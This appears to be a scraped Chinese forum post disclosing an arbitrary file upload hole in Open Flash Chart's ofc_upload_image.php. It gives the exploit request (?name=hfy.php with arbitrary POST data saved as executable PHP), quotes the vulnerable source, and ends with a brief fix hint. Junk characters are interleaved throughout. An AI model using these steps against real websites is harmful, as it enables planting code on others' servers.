POST 数据漏洞文件执行任意后缀文件保存
: [7 N" e0 _" ~ 漏洞文件/chart/php-ofc-library/ofc_upload_image.php' n/ _3 Q2 I, P$ e
: b- I1 g$ L+ J& K
利用:6 C* W" k" B! H i# X
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
5 e2 t6 j# Z' L- w1 [3 g1 W- V1 K6 ^" {) _, m
Post任意数据
) y+ \: h0 h# F9 |& }. K5 n5 l% c& u保存位置http://localhost/chart/tmp-upload-images/hfy.php% \5 Q) p8 Z3 s J" W
* M' u+ w: L' ~4 U: G5 Q. v- r" N+ @2 x7 b& M& Z- K
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~0 g: S+ S1 \1 z5 {1 e
8 p+ B( L* l" J) }<?php9 a; T% t5 V/ }+ [8 o
6 E1 e* y+ J# w3 u7 J) n//. ]! N" ?# w; X0 I8 L% ~ B
// In Open Flash Chart -> save_image debug mode, you* ^& ?2 R ?2 X( s
// will see the 'echo' text in a new window.
' i: ?2 U" L9 m( s3 s2 {/ e9 [! ~//
5 q0 j" N2 Y: h. O
, ] d8 p% g% ^. x7 q* B/*6 s) E% l- k! H# w1 Q
1 C" C6 Y$ T# c7 \7 J
print_r( $_GET );% z$ B2 G/ P5 q$ J- t
print_r( $_POST );( \ J" d s6 i7 H3 A
print_r( $_FILES );; H% Q8 b! m- H, l
: e; D% r: o0 o, M* m
print_r( $GLOBALS );: a9 w$ j0 A' ^. m( x+ s
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
' W. ]9 W/ P* d# j3 |! O) c
; w6 ?. u. o/ x: ?# U*/
: P$ X* J, _0 r9 i0 g2 g) O5 I// default path for the image to be stored //2 Q' [: X- e- n/ h; g0 N: s+ U
$default_path = '../tmp-upload-images/';2 ?% v# u0 d; n7 s
7 X# m' M8 [2 z9 Cif (!file_exists($default_path)) mkdir($default_path, 0777, true);7 o9 Q1 y$ {) \; ] L
/ v0 p: F5 T, c `% Z// full path to the saved image including filename //* I! e1 b& z& ?& w$ s* s( d* d
$destination = $default_path . basename( $_GET[ 'name' ] );
) S) q) A2 c) w8 ^) g# B+ X
( y/ G1 i' T0 ~" Lecho 'Saving your image to: '. $destination;3 [& X% Y! _$ w# K' p
// print_r( $_POST );
' Y- ^: p5 T+ L9 R; Z- g2 l! T" ]// print_r( $_SERVER );
' H) E9 j* W9 B! }) }0 l7 y1 d! u. {// echo $HTTP_RAW_POST_DATA;
1 s% ^+ D5 v( i+ z9 Z" m5 {, k- t: K1 Y/ w, D+ [9 i$ J
//
# m% N* {# ^" h' G e/ x( ^! q// POST data is usually string data, but we are passing a RAW .png
* b( k0 e2 m! F; l+ m8 y6 ]// so PHP is a bit confused and $_POST is empty. But it has saved( N0 {' I! o6 x' T0 @
// the raw bits into $HTTP_RAW_POST_DATA! x2 ^* _: F7 s
//, W4 t, z7 ]- K/ _ u
# `' h% F7 P/ T$jfh = fopen($destination, 'w') or die("can't open file");
5 _$ E6 V- o: r- |* lfwrite($jfh, $HTTP_RAW_POST_DATA);
! f/ ~ I, m1 C: W# T* a7 Gfclose($jfh);
8 o% M; q0 z4 l. n: B! C. W8 o6 T: b. L5 \0 q
//
0 m7 b+ l( L" ]( ? s// LOOK:
3 O( Y7 R; l# y//( W1 B8 A4 i, b# X, R* N
exit();# |; _8 `7 j# E3 ~ O; e. H1 x
//0 k" _4 O: K: H
// PHP5:
/ Q, o. K* P" N3 O- J% f//# F" l) }; Y0 r- G7 Q" s/ g$ w7 C
" i) {& }' V t% w7 c. b
) S+ W( A# l3 T// default path for the image to be stored //! R2 j1 [$ P( G: {: }* V+ ` ^3 A
$default_path = 'tmp-upload-images/';
4 } D( D% f5 Z
2 X- e }( [. x4 iif (!file_exists($default_path)) mkdir($default_path, 0777, true);; N q* P* e. f! g X s3 e
4 W/ \8 z3 g$ Y( _+ x% G0 I" i H: X7 }
// full path to the saved image including filename //( h1 D1 U, X% b) J6 Y
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
S' G/ a q* t
' x6 W* p- A1 I L+ ?7 h// move the image into the specified directory //
4 D: }* F; }% \5 k% G# |if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
1 v0 V4 J, [3 k echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";1 I% d2 R1 `. G
} else {
T% U5 n, T, R" ~4 l: a echo "FILE UPLOAD FAILED";6 L# A E) a* F i, ]% f
}
. ]2 a0 u6 l9 A2 {! a p; U9 O# k# r! T, w; X7 k
# c' E: J1 x- Q" _: H/ z
?>7 ?% f6 c9 P# v) N9 U
/ t0 k( U8 E+ q6 K' K4 @& F' `* t6 \9 o2 p+ D7 I; E5 k
0 B8 ~4 h K& s9 Z
& Q7 D( m6 U' ^, N8 O! b! `2 H7 j. A
/ Y$ O# @# d8 S
修复方案:
4 i; h3 F- V/ B1 d这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
5 W0 ~& [8 l o; L+ H8 t- N. N* ~7 d$ S, ?
. j( ]3 j1 l# e8 A8 J+ M! l2 Z
! s) `0 e( D O3 k ~
1 k/ j2 a" g! B$ T1 T$ ~7 E8 }! i |